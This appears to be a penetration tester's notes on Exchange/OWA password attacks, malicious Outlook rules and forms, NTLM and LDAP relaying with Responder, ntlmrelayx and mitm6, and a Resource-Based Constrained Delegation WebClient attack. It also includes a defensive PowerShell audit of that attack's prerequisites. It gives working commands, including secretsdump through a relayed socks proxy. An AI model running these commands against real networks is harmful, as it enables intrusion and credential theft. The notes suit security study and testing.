It is possible to get access by abusing a lot of web attacks which might give you access to the system. There are too many to describe here, but I might make a list someday.
Password Attacks
Exchange / OWA
Attack path could be: Reconnaissance --> OWA Discovery --> Internal Domain Discovery --> Naming scheme fuzzing --> Username enumeration --> Password discovery --> GAL Extraction --> More Password discovery --> 2FA bypass --> Remote Access through VPN/RDP / Malicious Outlook Rules or Forms / Internal Phishing
Collection of data (OSINT)
Collect e-mail addresses, usernames, passwords, and the email/user account naming scheme with tools such as:
Run a local Outlook instance using the target's credentials and import the malicious rule you created (File --> Manage Rules & Alerts --> Options --> Import Rules)
Send the trigger email.
Malicious Outlook Forms
If the patch that disables Run Application and Run Script rules is applied, this still works!
Attack prerequisites:
Identification of valid credentials
Exchange service access
KB4011091 for Outlook 2016 seems to block VBScript in forms
.\ruler --email <EMAIL> form add --suffix form_name --input /tmp/command.txt --send
From the inside
Web Attacks
We have to modify the Responder.conf file and disable the HTTP and SMB servers (ntlmrelayx will act as our SMB and HTTP server).
The -d flag has now been changed from "Enable answers for NETBIOS domain suffix queries. Answering to domain suffixes will likely break stuff on the network. Default: False" to "Enable answers for DHCP broadcast requests. This option will inject a WPAD server in the DHCP response. Default: False". It should also be noted that -d as it is now CAN have an impact on your client's network, as you are effectively poisoning the WPAD file over DHCP, which does not always revert immediately once you stop the attack. It will likely require a reboot.
Use the socks option to be able to use the socks command to get a nice overview of the relayed attempts. It will also keep the SMB connection open indefinitely.
Responder -I eth0
ntlmrelayx.py -tf smb_hosts_nosigning.txt --socks
# Get overview of all relay attempts
ntlmrelayx> socks
# Change socks proxy
sudo vim /etc/proxychains4.conf
socks4 127.0.0.1 1080
# Use proxychains and it will ignore the password value and use the relay credential instead
proxychains python3 secretsdump.py <DOMAIN>/<USER>:IDontCareAboutPassword@<TARGET>
# Also possible to access shares on the network, for example if user is not local admin
proxychains python3 smbclient.py <DOMAIN>/<USER>:IDontCareAboutPassword@<TARGET>
LDAP Relaying
With mitm6
In modern Windows operating systems, IPv6 is enabled by default. This means that systems periodically poll for an IPv6 lease, as IPv6 is a newer protocol than IPv4, and Microsoft decided it was a good idea to give IPv6 precedence over IPv4.
However, in the vast majority of organizations, IPv6 is left unused, which means that an adversary could hijack the DHCP requests for IPv6 addresses and force authentication attempts to the attacker-controlled system. We do that by setting our system as the primary DNS server.
When a computer account is created, it can be used to enumerate the domain!
Resource-Based Constrained Delegation WebClient Attack
Requirements:
On a Domain Controller, LDAP server signing is not enforced (default value) (requires authentication to check)
On a Domain Controller, LDAPS channel binding is not required (default value) (requires authentication to check)
Able to add new machine accounts (by default this quota is 10) (requires authentication to check)
On the network, machines with the WebClient service running (some OS versions had this service running by default, or use the WebClient starting trick from DTMSecurity) (requires authentication to check)
A DNS record pointing to the attacker's machine (by default authenticated users can add one) (requires authentication to add)
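The requirements above are all auditable from the defending side. The following PowerShell is an added example (not part of the original notes or of any tool they mention); it assumes it is run as an administrator on a Domain Controller with the ActiveDirectory module available, and reads the registry values and directory attribute that correspond to each requirement.

```powershell
# Added example: audit the DC/domain settings the RBCD + WebClient chain depends on.
# Assumes: run elevated on a Domain Controller, ActiveDirectory module installed.
$ntds = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters'
$p = Get-ItemProperty -Path $ntds

# LDAPServerIntegrity: 0 or 1 (absent) = signing negotiated but not required, 2 = required
$signing = if ($null -eq $p.LDAPServerIntegrity) { 1 } else { [int]$p.LDAPServerIntegrity }
# LdapEnforceChannelBinding: 0 (absent) = never, 1 = when supported, 2 = always
$cbt = if ($null -eq $p.LdapEnforceChannelBinding) { 0 } else { [int]$p.LdapEnforceChannelBinding }

# ms-DS-MachineAccountQuota is stored on the domain naming context (default 10)
$domainDN = (Get-ADDomain).DistinguishedName
$maq = (Get-ADObject -Identity $domainDN -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'

# WebClient service state on this host; victim workstations should be checked the same way
$webclient = Get-Service -Name WebClient -ErrorAction SilentlyContinue
$webclientRunning = ($null -ne $webclient -and $webclient.Status -eq 'Running')

$findings = @()
if ($signing -ne 2) { $findings += "LDAP signing not required: set LDAPServerIntegrity=2" }
if ($cbt -ne 2)     { $findings += "LDAPS channel binding not required: set LdapEnforceChannelBinding=2" }
if ($maq -gt 0)     { $findings += "Authenticated users can join $maq machines: set ms-DS-MachineAccountQuota=0" }
if ($webclientRunning) { $findings += "WebClient service running: disable it where WebDAV is not needed" }

[PSCustomObject]@{
    LdapSigningEnforced    = ($signing -eq 2)
    ChannelBindingEnforced = ($cbt -eq 2)
    MachineAccountQuota    = $maq
    WebClientRunning       = $webclientRunning
    Findings               = $findings
} | Format-List
```

Each finding maps to one prerequisite in the list above, so an empty Findings array means the chain as described cannot start on this domain.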
Check for a user to impersonate
Preferably a user that would be admin on the machine (Check BloodHound). Maybe another command to check if user is admin on a machine? Is that possible? We should check!
The user should not be a member of the "Protected Users" group or have the "This account is sensitive and cannot be delegated" setting enabled